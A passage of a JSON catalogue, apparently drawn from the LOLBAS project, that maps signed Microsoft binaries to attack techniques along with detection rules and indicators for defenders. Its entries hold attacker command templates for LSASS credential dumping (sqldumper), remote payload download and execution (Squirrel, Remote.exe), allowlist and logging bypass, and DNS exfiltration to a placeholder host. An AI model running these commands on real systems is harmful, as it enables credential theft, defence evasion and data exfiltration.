must be provided as dump still created.","usecase":"Performs execution of unsigned DLL.","mitre":["T1202"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Process creation with given '-md' parameter"},{"type":"IOC","value":"Anomalous child processes of procdump"},{"type":"IOC","value":"Unsigned DLL load via procdump.exe or procdump64.exe"}],"references":["https://twitter.com/ajpc500/status/1448588362382778372?s=20","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Procdump/"]},{"id":"lolbas:procdump-exe:1","toolId":"lolbas:procdump-exe","toolName":"Procdump.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"procdump.exe -md {PATH:.dll} foobar","description":"Loads the specified DLL where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary.","usecase":"Performs execution of unsigned DLL.","mitre":["T1202"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Process creation with given '-md' parameter"},{"type":"IOC","value":"Anomalous child processes of procdump"},{"type":"IOC","value":"Unsigned DLL load via procdump.exe or procdump64.exe"}],"references":["https://twitter.com/ajpc500/status/1448588362382778372?s=20","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Procdump/"]},{"id":"lolbas:protocolhandler-exe:0","toolId":"lolbas:protocolhandler-exe","toolName":"ProtocolHandler.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ProtocolHandler.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office\\Office16\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office\\Office15\\ProtocolHandler.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml"},{"type":"IOC","value":"Suspicious Office application Internet/network traffic"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/"]},{"id":"lolbas:rcsi-exe:0","toolId":"lolbas:rcsi-exe","toolName":"rcsi.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"rcsi.exe {PATH:.csx}","description":"Use embedded C# within the csx script to execute the code.","usecase":"Local execution of arbitrary C# code stored in local CSX file.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"}],"references":["https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/rcsi/"]},{"id":"lolbas:rcsi-exe:1","toolId":"lolbas:rcsi-exe","toolName":"rcsi.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rcsi.exe {PATH:.csx}","description":"Use embedded C# within the csx script to execute the code.","usecase":"Local execution of arbitrary C# code stored in local CSX file.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"}],"references":["https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/rcsi/"]},{"id":"lolbas:remote-exe:0","toolId":"lolbas:remote-exe","toolName":"Remote.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Remote.exe /s {PATH:.exe} anythinghere","description":"Spawns specified executable as a child process of remote.exe","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\remote.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\remote.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"remote.exe process spawns"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml"}],"references":["https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/"]},{"id":"lolbas:remote-exe:1","toolId":"lolbas:remote-exe","toolName":"Remote.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Remote.exe /s {PATH:.exe} anythinghere","description":"Spawns specified executable as a child process of remote.exe","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\remote.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\remote.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"remote.exe process spawns"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml"}],"references":["https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/"]},{"id":"lolbas:remote-exe:2","toolId":"lolbas:remote-exe","toolName":"Remote.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Remote.exe /s {PATH_SMB:.exe} anythinghere","description":"Run a remote file","usecase":"Executing a remote binary without saving file to disk","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\remote.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\remote.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"remote.exe process spawns"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml"}],"references":["https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/"]},{"id":"lolbas:sqldumper-exe:0","toolId":"lolbas:sqldumper-exe","toolName":"Sqldumper.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"sqldumper.exe 464 0 0x0110","description":"Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).","usecase":"Dump process using PID.","mitre":["T1003"],"privilege":"admin","fullPath":["C:\\Program Files\\Microsoft SQL Server\\90\\Shared\\SQLDumper.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\vfs\\ProgramFilesX86\\Microsoft Analysis\\AS OLEDB\\140\\SQLDumper.exe","C:\\Program Files\\Microsoft Power BI Desktop\\bin\\SqlDumper.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/countuponsec/status/910969424215232518","https://twitter.com/countuponsec/status/910977826853068800","https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/"]},{"id":"lolbas:sqldumper-exe:1","toolId":"lolbas:sqldumper-exe","toolName":"Sqldumper.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"sqldumper.exe 540 0 0x01100:40","description":"0x01100:40 flag will create a Mimikatz compatible dump file.","usecase":"Dump LSASS.exe to Mimikatz compatible dump using PID.","mitre":["T1003.001"],"privilege":"admin","fullPath":["C:\\Program Files\\Microsoft SQL Server\\90\\Shared\\SQLDumper.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\vfs\\ProgramFilesX86\\Microsoft Analysis\\AS OLEDB\\140\\SQLDumper.exe","C:\\Program Files\\Microsoft Power BI Desktop\\bin\\SqlDumper.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"references":["https://twitter.com/countuponsec/status/910969424215232518","https://twitter.com/countuponsec/status/910977826853068800","https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/"]},{"id":"lolbas:sqlps-exe:0","toolId":"lolbas:sqlps-exe","toolName":"Sqlps.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Sqlps.exe -noprofile","description":"Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging.","usecase":"Execute PowerShell commands without ScriptBlock logging.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program files (x86)\\Microsoft SQL Server\\100\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\110\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\150\\Tools\\Binn\\SQLPS.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/execution_suspicious_powershell_imgload.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md"}],"references":["https://twitter.com/ManuelBerrueta/status/1527289261350760455","https://twitter.com/bryon_/status/975835709587075072","https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/"]},{"id":"lolbas:sqltoolsps-exe:0","toolId":"lolbas:sqltoolsps-exe","toolName":"SQLToolsPS.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"SQLToolsPS.exe -noprofile -command Start-Process {PATH:.exe}","description":"Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging.","usecase":"Execute PowerShell command.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md"}],"references":["https://twitter.com/pabraeken/status/993298228840992768","https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017","https://lolbas-project.github.io/lolbas/OtherMSBinaries/SQLToolsPS/"]},{"id":"lolbas:squirrel-exe:0","toolId":"lolbas:squirrel-exe","toolName":"Squirrel.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"squirrel.exe --download {REMOTEURL}","description":"The above binary will go to url and look for RELEASES file and download the nuget package.","usecase":"Download binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"]},{"id":"lolbas:squirrel-exe:1","toolId":"lolbas:squirrel-exe","toolName":"Squirrel.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"squirrel.exe --update {REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"]},{"id":"lolbas:squirrel-exe:2","toolId":"lolbas:squirrel-exe","toolName":"Squirrel.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"squirrel.exe --update {REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"]},{"id":"lolbas:squirrel-exe:3","toolId":"lolbas:squirrel-exe","toolName":"Squirrel.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"squirrel.exe --updateRollback={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"]},{"id":"lolbas:squirrel-exe:4","toolId":"lolbas:squirrel-exe","toolName":"Squirrel.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"squirrel.exe --updateRollback={REMOTEURL}","description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","usecase":"Download and execute binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"}],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"]},{"id":"lolbas:te-exe:0","toolId":"lolbas:te-exe","toolName":"te.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"te.exe {PATH:.wsc}","description":"Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.","usecase":"Execute Visual Basic script stored in local Windows Script Component file.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml"}],"references":["https://twitter.com/gn3mes1s/status/927680266390384640","https://github.com/LOLBAS-Project/LOLBAS/pull/359","https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/authoring-tests","https://lolbas-project.github.io/lolbas/OtherMSBinaries/te/"]},{"id":"lolbas:te-exe:1","toolId":"lolbas:te-exe","toolName":"te.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"te.exe {PATH:.dll}","description":"Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures.","usecase":"Execute DLL file.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml"}],"references":["https://twitter.com/gn3mes1s/status/927680266390384640","https://github.com/LOLBAS-Project/LOLBAS/pull/359","https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/authoring-tests","https://lolbas-project.github.io/lolbas/OtherMSBinaries/te/"]},{"id":"lolbas:teams-exe:0","toolId":"lolbas:teams-exe","toolName":"Teams.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"teams.exe","description":"Generate JavaScript payload and package.json, and save to \"%LOCALAPPDATA%\\\\Microsoft\\\\Teams\\\\current\\\\app\\\\\" before executing.","usecase":"Execute JavaScript code","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app directory created"},{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar file created/modified by non-Teams installer/updater"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml"}],"references":["https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/"]},{"id":"lolbas:teams-exe:1","toolId":"lolbas:teams-exe","toolName":"Teams.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"teams.exe","description":"Generate JavaScript payload and package.json, archive in ASAR file and save to \"%LOCALAPPDATA%\\\\Microsoft\\\\Teams\\\\current\\\\app.asar\" before executing.","usecase":"Execute JavaScript code","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app directory created"},{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar file created/modified by non-Teams installer/updater"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml"}],"references":["https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/"]},{"id":"lolbas:teams-exe:2","toolId":"lolbas:teams-exe","toolName":"Teams.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"teams.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"","description":"Teams spawns cmd.exe as a child process of teams.exe and executes the ping command","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app directory created"},{"type":"IOC","value":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar file created/modified by non-Teams installer/updater"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml"}],"references":["https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/"]},{"id":"lolbas:testwindowremoteagent-exe:0","toolId":"lolbas:testwindowremoteagent-exe","toolName":"TestWindowRemoteAgent.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000","description":"Sends DNS query for open connection to any host, enabling exfiltration over DNS","usecase":"Attackers may utilize this to exfiltrate data over DNS","mitre":["T1048"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\RemoteAgent\\TestWindowRemoteAgent.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"TestWindowRemoteAgent.exe spawning unexpectedly"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/TestWindowRemoteAgent/"]},{"id":"lolbas:tracker-exe:0","toolId":"lolbas:tracker-exe","toolName":"Tracker.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Tracker.exe /d {PATH:.dll} /c C:\\Windows\\write.exe","description":"Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.","usecase":"Injection of locally stored DLL file into target process.","mitre":["T1127"],"privilege":"user","fullPath":["no default"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml"}],"references":["https://twitter.com/subTee/status/793151392185589760","https://attack.mitre.org/wiki/Execution","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/"]},{"id":"lolbas:tracker-exe:1","toolId":"lolbas:tracker-exe","toolName":"Tracker.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Tracker.exe /d {PATH:.dll} /c C:\\Windows\\write.exe","description":"Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.","usecase":"Injection of locally stored DLL file into target process.","mitre":["T1127"],"privilege":"user","fullPath":["no 